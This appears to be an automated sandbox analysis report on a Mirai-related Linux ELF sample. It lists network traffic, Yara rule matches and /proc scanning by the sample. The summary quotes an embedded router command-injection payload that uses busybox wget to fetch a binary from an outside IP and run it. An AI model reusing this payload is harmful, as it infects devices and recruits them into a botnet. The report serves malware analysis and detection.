              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
              Source: unknownNetwork traffic detected: HTTP traffic on port 47474 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39520
              Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
              Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39522
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
              Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57252 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39516
              Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
              Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39518
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40502
              Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
              Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
              Source: unknownNetwork traffic detected: HTTP traffic on port 43988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
              Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40500
              Source: unknownNetwork traffic detected: HTTP traffic on port 46594 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52548
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
              Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52542
              Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39514
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52544
              Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39504
              Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
              Source: unknownNetwork traffic detected: HTTP traffic on port 36780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
              Source: unknownNetwork traffic detected: HTTP traffic on port 35466 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40570
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39580
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39582
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39584
              Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
              Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39588
              Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40568
              Source: unknownNetwork traffic detected: HTTP traffic on port 38106 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40562
              Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40566
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
              Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39570
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39572
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
              Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
              Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
              Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40556
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
              Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
              Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39562
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
              Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
              Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
              Source: unknownNetwork traffic detected: HTTP traffic on port 39828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40546
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
              Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
              Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40544
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49606 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40542
              Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
              Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
              Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
              Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39552
              Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39554
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
              Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39558
              Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40530
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
              Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
              Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45256 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40534
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
              Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
              Source: unknownNetwork traffic detected: HTTP traffic on port 40036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40490
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52476
              Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
              Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
              Source: unknownNetwork traffic detected: HTTP traffic on port 56864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52482
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
              Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40484
              Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39496
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
              Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39498
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
              Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
              Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
              Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40478
              Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40476
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40470
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
              Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39488
              Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
              Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
              Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
              Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
              Source: unknownNetwork traffic detected: HTTP traffic on port 33728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40462
              Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
              Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40460
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39470
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39472
              Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39474
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
              Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
              Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
              Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40458
              Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
              Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40452
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
              Source: unknownNetwork traffic detected: HTTP traffic on port 33224 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40456
              Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40454
              Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
              Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
              Source: unknownNetwork traffic detected: HTTP traffic on port 55984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
              Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: ZhhHfkNewm.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
              Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0+h+dPOST /tmUnblock.cgi HTTP/1.1
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: ZhhHfkNewm.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engineClassification label: mal80.troj.linELF@0/1@0/0
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1582/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2033/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2275/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/3088/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1612/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1579/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1699/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1335/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1698/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2028/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1334/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1576/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2302/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/3236/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2025/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2146/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/910/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/4444/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/4445/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/912/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/4446/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/517/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/759/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2307/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/918/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1594/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2285/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2281/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1349/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1623/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/761/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1622/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/884/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1983/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2038/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1344/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1465/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1586/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1860/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1463/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2156/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/800/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/801/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1629/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1627/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1900/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/3021/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/491/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2294/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/2050/mapsJump to behavior
              Source: /tmp/ZhhHfkNewm.elf (PID: 6217)File opened: /proc/1877/mapsJump to behavior
